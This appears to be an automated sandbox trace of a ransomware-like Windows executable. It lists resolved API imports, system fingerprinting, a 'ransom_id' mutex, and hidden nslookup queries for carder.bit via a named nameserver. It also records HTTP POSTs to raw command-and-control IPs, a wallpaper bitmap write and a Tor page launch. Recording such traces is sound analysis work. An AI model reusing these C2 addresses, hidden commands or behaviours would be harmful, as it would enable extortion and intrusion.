Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x76e95929 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x76ea9af0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76e94442 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76e954ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x76ead4f7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76ea10b5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x76e9dd0e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x76e97a2f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x76e943e2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x76eac860 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76e949d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x76e95063 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76e91986 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x776e2c42 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76e91136 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x777292b9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76e9418b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x76eb828e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76e95235 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x76ead5cd True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x76e91909 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76e91700 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x7770d598 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76e93f5c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76e94950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76e91282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76e934b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x76e91826 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x76e918f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x76e9196e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x76e91b48 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76eb2a9d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76e91245 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76e91856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76e91222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76e914e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76e914c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x76e9424c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76eb3102 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76e911c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76eac807 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76e9168c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x76e95558 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x76ead4dc True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MulDiv, address_out = 0x76e91b80 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76e9588e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76e9110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76e93ed3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x76e93e8e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76e9186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x76eaf7aa True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76e934d5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76e91809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x776de026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76e95a4b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x776d22b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76e97a10 True 1
Module Load module_name = USER32.dll, base_address = 0x759f0000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextW, address_out = 0x75a125cf True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextA, address_out = 0x75a1aea1 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x75a072c4 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x75a07446 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75a11341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75a09a55 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x75a078e2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x75a088f7 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75a11361 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x75a10eb6 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75a07809 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x75a0b17d True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x75a08332 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x75a5fd1e True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x75a1ae5f True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x75a090d3 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75a10dfb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75a08a29 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75a09679 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x75a0787b True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776e25dd True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75a13559 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x75a12320 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x75a0fc5d True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x75a2e061 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x75a0b142 True 1
Module Load module_name = GDI32.dll, base_address = 0x76b00000 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76b15689 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76b14f70 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x76b154f4 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76b15f49 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetPixel, address_out = 0x76b1ccee True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectW, address_out = 0x76b16c3a True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetPixel, address_out = 0x76b1cbfb True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetStockObject, address_out = 0x76b14eb8 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x76b1d41c True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkColor, address_out = 0x76b152d8 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x76b16001 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76b14de0 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x76b158b3 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x76b1b600 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextColor, address_out = 0x76b1522d True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x77050000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x770640fe True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7706469d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x770614d6 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77064304 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77060e24 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77060e0c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7706431c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x770591ea True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7705df14 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x770777cb True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7705e124 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7705c532 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7707779b True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x77058ee9 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7705c51a True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x770646ad True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7706468d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x770640e6 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7706412e True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x7706157a True 1
Module Load module_name = SHELL32.dll, base_address = 0x75e00000 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x75e20468 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e13c71 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e21e46 True 1
Module Load module_name = CRYPT32.dll, base_address = 0x75790000 True 1
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x757ca8c5 True 1
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x757c5d77 True 1
Module Load module_name = WININET.dll, base_address = 0x75d00000 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d1ab49 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x75d24fae True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x75d2ba12 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x75d2492c True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x75d24a42 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d29197 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d1b406 True 1
Module Load module_name = PSAPI.DLL, base_address = 0x77680000 True 1
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x776814cc True 1
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x77681514 True 1
Thread 0x7d4
89 35
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=8a13d26b705ba84c True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
System Get Time type = Ticks, time = 12495 True 1
System Get Computer Name result_out = YKYD69Q True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
System Get Info type = Hardware Information True 1
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Close Session - True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Inet Read Response size = 10238, size_out = 14 True 1
Inet Read Response size = 10238, size_out = 0 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Inet Close Session - True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, type = size True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 238601, size_out = 238601 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0x418, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
File Read size = 4096, size_out = 306 True 1
Inet Close Session - True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = 87.97.250.231, server_port = 80 True 1
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = steiphai?deere=ayssey&iezaer=seyst, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 87.97.250.231/steiphai?deere=ayssey&iezaer=seyst True 1
Inet Read Response size = 204798, size_out = 552 True 1
Inet Read Response size = 204798, size_out = 0 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Inet Close Session - True 1
System Get Time type = Ticks, time = 20326 True 1
System Sleep duration = -1 (infinite) True 1
System Get Time type = Ticks, time = 21434 True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0x5e8, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
File Read size = 4096, size_out = 308 True 1
Inet Close Session - True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = 185.42.194.116, server_port = 80 True 1
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = fee, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 185.42.194.116/fee True 1
Inet Read Response size = 204798, size_out = 0 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Inet Close Session - True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x7705df04 True 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Process Create process_name = C:\Windows\system32\wbem\wmic.exe, show_window = SW_HIDE True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x7705df04 True 1
System Get Time type = Ticks, time = 27331 True 1
System Get Time type = Ticks, time = 28220 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 14 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 40 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 5184000 True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 1
Process Create process_name = https://www.torproject.org/download/download-easy.html.en, show_window = SW_SHOW True 1
Thread 0x7dc
264 0
Category Operation Information Success Count Logfile
Driver Enumerate load_addresses = 1638160 True 1
Driver Enumerate load_addresses = 2424832 True 1
Driver Enumerate load_addresses = 1638160 True 1
Driver Enumerate load_addresses = 2424832 True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x7705dfc8 True 1
Environment Get Environment String name = AppData, result_out = C:\Users\aETAdzjz\AppData\Roaming True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x7705dfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x7705df04 True 1
